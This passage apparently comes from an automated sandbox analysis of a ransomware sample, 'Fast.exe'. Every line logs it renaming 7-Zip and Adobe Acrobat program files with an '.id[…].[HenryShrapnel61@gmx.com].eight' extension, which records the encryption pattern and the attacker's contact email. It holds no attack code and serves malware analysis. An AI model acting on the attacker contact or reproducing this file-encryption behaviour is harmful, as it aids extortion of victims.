Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uz-cyrl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\uz.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\va.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\vi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\yo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\zh-cn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\zh-tw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\License.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\readme.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Uninstall.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\A3DUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ACE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat.tlb.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_reader_appicon_16.png.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_100_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_200_percent.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\chrome_elf.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\COPYING.LGPLv2.1.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\LICENSE.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\en-US.pak.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\snapshot_blob.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libEGL.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\libGLESv2.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\v8_context_snapshot.bin.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vk_swiftshader_icd.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroDunamis.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\vulkan-1.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Adobe.Acrobat.Dependencies.manifest.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\adobeafp.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeLinguistic.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeXMP.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AGMGPUOptIn.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ahclient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ANCUtility.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXE8SharedExpat.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AXSLE.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIB.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\BIBUtils.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\manifest.json.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\nppdf32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_asym.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_base_non_fips.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ccme_ecc.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRClient.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cryptocme.sig.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cr_win_client_config.cfg.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DirectInk.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. FOIA.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\U.S. Privacy Act.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\LocaleDisplayNameMap.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\SearchRedactPatterns.xml.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ExtendScript.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icucnv67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icudt67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc58.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\icuuc67.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\JP2KLib.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\eula.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\license.html.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\stopwords.ENU.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Bold.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Light.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\AdobeClean-Regular.eot.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Bold.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\AdobeClean-Light.woff.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
